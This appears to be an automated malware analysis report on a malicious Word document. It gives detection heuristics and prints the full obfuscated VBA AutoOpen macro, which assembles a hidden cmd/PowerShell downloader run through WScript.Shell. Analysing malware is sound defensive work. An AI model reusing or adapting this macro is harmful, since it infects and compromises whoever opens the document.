MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of Shell() calls within the VBA macros. Additionally, OLE_VBA_WSCRIPT and OLE_VBA_CREATEOBJ firings confirm the use of WScript.Shell and CreateObject, commonly used to execute arbitrary commands. The AutoOpen macro suggests immediate execution upon opening. The script attempts to construct commands using string concatenation, likely to download and execute a second-stage payload.
Heuristics 10
-
ClamAV: Doc.Malware.Generic-6668129-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6668129-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Error 82430 / jZwzi / 82867 * iLwsqS SLVSFXt = CreateObject("WScript.Shell") _ . _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Error 82430 / jZwzi / 82867 * iLwsqS SLVSFXt = CreateObject("WScript.Shell") _ . _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "mpYijqLwRj" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10927 bytes |
SHA-256: 0f3dc9bb43f05af224845bc7ebd02f22fbd68a1518174291edf3d94dfab678f7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
148 of 240 identifiers look randomly generated (e.g. 'dwcNZCjjdtaSa'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "dwcNZCjjdtaSa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MjMiMjXLHS"
Function JUumPUlXL()
On Error Resume Next
Error UrrDWq * awfJb * EEWHY / azikIY
Error rpthQc / YDVrr
RvTnUkpqw = "MD /V" + "^:O" + "n/C " + " " + " " + Chr(1 + 0 + 4 + 0 + 29) + " ^S"
Error HSIvV * 27348
Error wswzf * BQjiU / 48649 / RzdYaw
Error Ozohi * HjidCI
wFlIwUcHf = "^et ^ ^" + " ^" + " " + "^s" + "^5" + "7W=A^A" + "C^A^g^" + "A^A^IA"
Error 70425 * vpmwmM * wzmFU * wXisO
Error KMJLp * BEcJLX / 25785 / DIsEO
ChVvMLAw = "^A" + "C" + "^" + "AgA^A" + "IA^AC" + "^A^g" + "^AAIA" + "AC^A" + "g^A^" + "AIA^A" + "C"
Error XnVzjh / 1836
Error 38139 * kDzrt
Error hHzsPq / 76287 * 98655 * zfoWqs
Error cQzLr / IkMnq * plATMk * luJlO
Error LfTQj / bGDLKW
AvdfVwn = "A^gAA^" + "IA" + "A" + "CA^g^" + "AQf^A0" + "HA7" + "B^AaAM" + "G" + "A0B" + "^QYAMG" + "A^9" + "BwO" + "^A^sG^A"
Error lkapN * 99200 * 45894 * ZpnDtW
GSPzOPKc = "^h^B^" + "QZ^A" + "I^HA^i" + "B^w^OA8" + "G^A^" + "m^Bgc^A" + "^QCA"
Error CPiRk / nHaOZS
Error rAiLo * pBAni
Error 55695 * RzadYj
Error 71956 / 96558 / 38634 * FfEtzC
Error 68818 / zzXAl
qslmPuilR = "^gA^Qb^" + "A^" + "UG" + "^A0" + "BQ^S" + "A0CA" + "l^B^w" + "^aA8" + "GA" + "^" + "2^BgbAk" + "E^"
Error iNSJG / azziS / XTmKVA / PpzSfh
Error cjPoci / JzXstY
olNSo = "A7^AQ^" + "KA^" + "8^G" + "^AmB" + "gcAQC^A" + "^gAAL^" + "Ak" + "^F^AvB"
Error QBwiLR / dCZojf / ncjVwS / 67848
Error 80646 / lJnnd
aDwvOGvzwq = "Q^SA" + "QC^A^" + "oAQ" + "^Z^A^wG" + "^A^pB^" + "gRAQGA"
Error CMCdk / hLzlmC
Error 66094 * fRHsj / 64656 / lrDIW
Error BdvAvz * jSrJrt * nVzGmi * fiDMwW
Error iEjQK / IUDXL
lJDssGCIbk = "^h" + "B^wb^Aw" + "^G" + "AuBwdA" + "^8^GA^" + "EB^gLA^" + "I^GA^" + "0"
Error 11879 * 57988 * 68207 * OsIdK
Error zsabY / BipPJ / ftCpd * DZPzT
Error BGFTMO * VLSVdo
Error YQQVwF / YzPWu * 85811 * wdhwIL
aOBwVU = "Bw" + "SAQC" + "A" + "^7^BQ" + "^" + "e^A"
JUumPUlXL = RvTnUkpqw + wFlIwUcHf + ChVvMLAw + AvdfVwn + GSPzOPKc + qslmPuilR + olNSo + aDwvOGvzwq + lJDssGCIbk + aOBwVU
Error 95575 / DYJzE
Error rMwUi / jjQoEU * DaoKt * wwwqFR
Error vwQwO / 8269 / 20672 * DiZGN
Error 28557 * zzbYw / 36593 * OVJum
End Function
Function JEnupYJwh()
On Error Resume Next
Error SjjiWv / SJYwW / kwFTmQ * WrDNla
Error 10575 / dPQMl
SDbJZwBI = "^I^HA" + "^0" + "B^w^e^A" + "kC^" + "Av^BQT" + "^A" + "^oGAk" + "A^AI^" + "A4G"
Error wsUYb / iJzaUj
Error oHPdp / aNGZB
nUCfhwz = "^ApB^A^" + "IA^kF^A" + "v" + "BQS" + "A" + "^" + "QC" + "^A^o^A" + "A^" + "aA^M^" + "GAh^B"
Error hsnNY / MMPCwu
Error 62685 / swiUt
dhWIDUzD = "^Q^" + "Z^AIH" + "^A" + "v^B" + "^g^" + "Z" + "A^sD" + "^AnA^"
Error 94245 * vuuNdT / 40655 * bbmjoY
Error wbJPq * 64109
PEuXmr = "QZ" + "^A^g^H" + "^A^l" + "^B" + "g^L^A" + "cCArA^A" + "R" + "^A" + "IGA^i^"
Error UTjGjK * CwGTq / 35533 / PYUhf
Error 61376 * GLiijm * 91942 / Siwzj
Error 70168 * EiPjV
WaFUHVW = "B" + "A" + "^JA^s" + "CA" + "n^A^" + "AXAcC" + "^A" + "rA^wYAk" + "^GAs^"
Error 101 * tJATYb * 10110 * dCWoS
Error 44989 * 49130
Error vdwDF / SDkXUW * Fwhzaf / ojVSC
Error zrAkcF * SkiHzu / 24935 * UzmCIj
pGttoVFBWc = "BgY^A" + "^UH^" + "A" + "^wBg^OA" + "^Y^H^A" + "^uBQ^Z" + "A" + "^QC" + "A^9^Aw^" + "b"
Error pEvEq * 4759
Error OCEFiB / bMIjB * 36624 / jKaXAz
LJYQHH = "^" + "AYG^" + "A" + "^y^B^A" + "J^As^"
Error sLslfo * 9114 / SVztw / BDKiRz
wiGDcBBh = "D^AnAQN" + "^AA^" + "DAx^" + "Aw^J" + "^AAC^" + "A9AA" + "^I^A" + "QE^Ai^B" + "g^Y^A^" + "QC^A" + "7^AQ^K" + "A" + "cC^A^A^"
Error cONAKd / 21190
qzCVKFChqA = "Bw^J" + "^A^gCA" + "^0BQa^A" + "^" + "wGAw" + "B^w^U" + "A^4C" + "An^A^Qb" + "^A^M^" + "H^" + "Ak^Bg^Y" + "^A^gE" + "^A"
Error 37594 / OtSSQW
Error asEVVF * 65744 * 53441 * HqGtA
Error 550 / 24451
TtKjFOW = "v^" + "AwcA^Q^" + "G" + "^A" + "hB" + "^wbA^w^" + "GAw" + "B" + "Q^" + "d" + "^" + "A^8CA^" + "0^B"
Error XKVli * 51672
Error oHVlsm / LdSiv / wrRLHW * QcfhRl
JLnltD = "^g" + "^b" + "AUG^A" + "^0" + "^Bg" + "^" + "bA^8G" + "^"
Error HSnoT * 92825 / 87131 / AjQKi
Error 33742 / jFSsQw * 43871 * WFGpow
Error 12772 * OEzhXN / BnwbAE * wtiLb
kSROHDFCF = "AjBQ^L^" + "AA" + "H" + "A3BwLAU" + "^G^A0B^" + "QaA" + "MHA" + "i^BQ^" + "ZAc" + "HA" + "vA^Q" + "^bA8G^" + "Aj^"
JEnupYJwh = SDbJZwBI + nUCfhwz + dhWIDUzD + PEuXmr + WaFUHVW + pGttoVFBWc + LJYQHH + wiGDcBBh + qzCVKFChqA + TtKjFOW + JLnltD + kSROHDFCF
Error omPKqZ / iwvGJ * CJvtSN * 79847
Error MGmJs * 8670
End Function
Function ObASoj()
On Error Resume Next
Error fkKsBz / 80200
Error zqPaq * rPiotz
Error bRsSm * nqABwc / 22641 * 13179
jzPJksJW = "B^" + "gL^A" + "^Q^D^Av" + "^Bgc^" + "A^A" + "^HAl^B" + "gc^A8C" + "^Av^Ag^" + "O^" + "AA^H^" + "A^0BAd" + "^A"
Error 98525 / FGHwa / 94673 / KliEtj
qLRizBfD = "g^" + "G^AA" + "^BA" + "^W^" + "A^M" + "DAvA^Q" + "bA^8GAj" + "^"
Error Liwri / jABFo / WzjjK / czuJl
Error 92423 / tNUWUD / DizFm * zXnoSa
Error 53929 * HopXP / 19403 * FMdSqi
QJSlJt = "B" + "^gL" + "A^w^G^" + "A^pB^wc" + "A^" + "EG" + "Ay^B^" + "g" + "^Y^" + "A8G^Ak"
Error cwIZG / GBzGv
NhNvnC = "^B^gY^" + "A^IH^" + "Ah^BQb^" + "A^8CAvA" + "g" + "^O^A^" + "A^H^A^" + "0BAd^" + "A" + "^g^" + "GA^A^Bg" + "c^" + "A^s^G"
Error 40740 / wAUHoT * Qzsszw / 24296
Error 92730 / zwqsTB / JhoFk * qWkBbv
Error frBYsl / QpoIX
Error 74862 / hfKazL / 70545 * ostuAc
Error jiklw * PmaXX / bGVSPt / lkXNvz
tihwjXP = "^Ar^" + "B^" + "QOAYHA" + "^2^BAb" + "^A^kDAv" + "A"
Error WwjZq * obZoEv
Error AtdRXI / NOzuLu / 10707 * iOLWK
Error 90433 * WRVAU / QNfzqJ / wTRbhS
Error 59639 * AEoKa
Error LjJBSs * rjirFZ
Error 60973 * dkaKLh * wBBpW * QzDOZP
hCnlbWjFqz = "gc^" + "A" + "^Y^G" + "^A^u^" + "Awc^A^" + "E^" + "GAr^B^" + "Qd^A^w" + "G^AuA^Q" + "^MA"
Error jhVVcN / wJbXbd
Error QlGcr * snYbln / 9036 * KELtYz
Error dOjVXz / MrTFtk
Error ViCWU * zcPhUF * PWsLq * WRDcq
Error MqHYBY / WVfEa * JPdRk * iisdq
TwQIwWqw = "A" + "^H" + "A3^Bw" + "LA^8C" + "A^6^" + "A^AcAQH" + "A0" + "^BA" + "aA" + "AEA"
Error 39013 / CUMQd
mQfUavVbEI = "2A^wc" + "A8C^A" + "t^B^wb" + "A^M^G" + "^AuA^" + "Q" + "YA^kH^A" + "^h^Bg" + "^Y" + "AE^G^" + "AyBQ" + "^dA" + "^M^H^"
Error 54931 / wKGbo * hIMLAL * jnXYjS
vlYHwQij = "A" + "w^B^w^b" + "AQ^H^A" + "h^B" + "gcAE^GA" + "^j" + "B^QYA" + "c^"
Error cJuhbz / EQnZt
Error LiiavU / 7706 / 53887 * MtYMf
zTORLz = "G^A^u^" + "B^QZ^A" + "^A" + "^" + "H^" + "Au" + "^A^g^" + "bA" + "E^G^A" + "p^BQ^Y^"
ObASoj = jzPJksJW + qLRizBfD + QJSlJt + NhNvnC + tihwjXP + hCnlbWjFqz + TwQIwWqw + mQfUavVbEI + vlYHwQij + zTORLz
Error 15156 / HOKdJI
Error 71735 * IQzctO / NEkmnR * UHKdG
Error WGbTQ / jkBNLh
Error KjnCSS * bLcSdJ / SQFpRt / 26046
End Function
Function nAzzLrMfvdG()
On Error Resume Next
Error QDdqG * dcuvwA
Error 96827 * Yaabsz
Error vSlIVP / 68620
Error zLliH / kbLRmZ
Error ToEusH * Sfrct / 63967 / ZwzoQS
qMMwjAdXHI = "AI^" + "H^A^" + "l^B^" + "w^Y" + "^AI^H" + "^A" + "^l^B^A"
Error vlUud * IKtOi * 21886 / VaSKt
HjDQGQfG = "c" + "AE^G^A" + "^yB" + "Q" + "^YA^" + "M^"
Error INzJhD * KGHiYw
jvQUAZSu = "G^AhB^w" + "Z^A4^" + "G^A^" + "lB^Ac" + "^A8C^" + "Av^Ag" + "OAA^" + "HA" + "^"
Error kwbfF / InXUl * PcAnGA / MRXWnl
Error 92141 * 45743 * 14904 * oArPdf
BFNOsJdr = "0B^A" + "^d" + "^A^gGA" + "A^B^wRA" + "A^F^" + "AiB^w" + "c^A"
Error 61237 / mMiMAE
Error 85673 / zWiGz / 92485 * icYOn
pYPaqEzU = "s^G^A^" + "G^B" + "^Q^b" + "A^I^H" + "Av^AQ" + "Z" + "A^sG^Au" + "^A" + "w^b^AM" + "^G" + "Au^A" + "wcA^Q"
Error 48037 / rwAZf
Error OoMbou * 90063 / QWZwG / SjoIib
Error 84677 / 24502 / 78626 * msJjjq
Error 57885 / XuGcj * 46891 / jLviC
mRnjIWh = "^H^A^uB" + "^QdA" + "8G^" + "A" + "t^B" + "^g^Y" + "AU" + "^G^" + "A^3B^" + "wLA8C" + "A6AAc^A"
nAzzLrMfvdG = qMMwjAdXHI + HjDQGQfG + jvQUAZSu + BFNOsJdr + pYPaqEzU + mRnjIWh
Error FRwzQB * lTUAS * 19075 * 62052
Error UfnUPR / JkGUv
End Function
Function LCPiiwCsXW()
On Error Resume Next
Error 22223 / 55168 * jGihF / nhjMT
Error RDWODC / OpzlV
Error 94097 * rsaQC
Error 74461 / 66531
GFsFajN = "Q^HA0" + "B" + "^Aa^Ac" + "CA^" + "9" + "A^w" + "bA0E" + "A^q^BA" + "^J^AsD" + "A" + "0B^g^"
Error 70280 * Poirj * RiHsvF / 17149
Error 35307 * zfodw / JfqQt / bUsAnz
Error ibBUQz * YOaZm
Error AFOwW / 53973 * 73179 / TOKwi
MkSwaJAG = "b^A^UG^" + "ApBA^b^" + "AM^E^" + "A^iBQZ^" + "AcF^" + "Au^A^A" + "^dAU^G" + "^A^" + "O^BAIAQ" + "HA^" + "j" + "BQ^Z^A^" + "oGA"
Error HFirlw * KIkGw
Error IOozu / FfHSHw
Error iNmdb * dZzjB * nwZUHS * 94150
Error SBzWr / GthsFo / Sfjid / oWHDl
YatkbnMcwGj = "^i^B^" + "wb" + "A" + "0CA3" + "^BQ" + "ZA^"
Error OhiXrE * zOirLM / iYHLI / MzrlEj
Error 55156 / Yqmzb * 5952 * bFdatv
iqDwwc = "4^G" + "^A^9A" + "^" + "g^Y" + "A^Q^H^A" + "L^BA" + "^J^ ^e-"
Error tkKqtY / ksSCW / Thnbl / ptSHr
Error 32502 * MjzUt
Error zWHNrf / zObws
RufGROVWZE = " ^l^l^" + "eh^sr^" + "ewo^p& " + "f^" + "oR " + " /^L %" + "^G ^"
Error 50634 * SCMasd * aXDHEG / iRoMsF
Error AMRKXL / iwWjiZ
Error RVArKr / 16933
zVzvBSwQj = "IN " + "(^ ^" + " ^ " + " ^10" + "^61" + ",^ ^ ^" + "-1^" + " ^ ^" + " ^"
Error 66770 * mTEsYH / 76681 / qNoUm
Error 32946 / wfqHAj
Error 71267 * 82851 / BSmRW / qQIJr
sSzKLYcPj = ",^ 0 ^" + " ^ )" + "d^O " + " " + "^sE" + "^t " + " ^t^Kz" + "=!" + "^t^Kz!!"
Error QzwHCk * znrnZ / jPiaM / NzwQlt
Error UXzuzR * SDDrK / cTLtFQ * iFwZQJ
huNcjHHpdDr = "^s^5" + "7W:" + "~ %" + "^G, 1" + "!&& ^" + "i^F " + "%^G " + " L^" + "E^Q "
Error 42215 / CRqIw / NzDjAi / hKOqp
Error aZinD / BFHjHv
azMal = "^" + "0 ca^l^" + "L %" + "^t^Kz" + ":~^ ^ ^" + "-^1" + "^06" + "2% " + " " + " " + Chr(1 + 0 + 4 + 0 + 29) + " "
LCPiiwCsXW = GFsFajN + MkSwaJAG + YatkbnMcwGj + iqDwwc + RufGROVWZE + zVzvBSwQj + sSzKLYcPj + huNcjHHpdDr + azMal
Error 71595 * 57924
Error aaHCC * 65385
Error 95241 * CvTqLm * 88853 / JmntTi
Error NAWlh / brEiE / 52961 / OTCDv
Error VRFFzK / 78098 * TXRjm * 15562
End Function
Attribute VB_Name = "mpYijqLwRj"
Sub AutoOpen()
On Error Resume Next
Error 50877 * 69896
Error 80640 * 76323
Error 82430 / jZwzi / 82867 * iLwsqS
SLVSFXt = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(1 + 0 + 2 + 8 + 56) + IfVBtJOR + MHozuTHI + JUumPUlXL + JEnupYJwh + ObASoj + nAzzLrMfvdG + LCPiiwCsXW + jIhVLDHFYtGT + ifNXDpTZVVw, 711730862 - 711730862)
Error BItcCs * JRPFk * 8988 / NKnLXW
Error 85878 / 36976
Error 33721 * 64194 / LaCWB * hOhOnK
Error qYWif * Qczzz
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.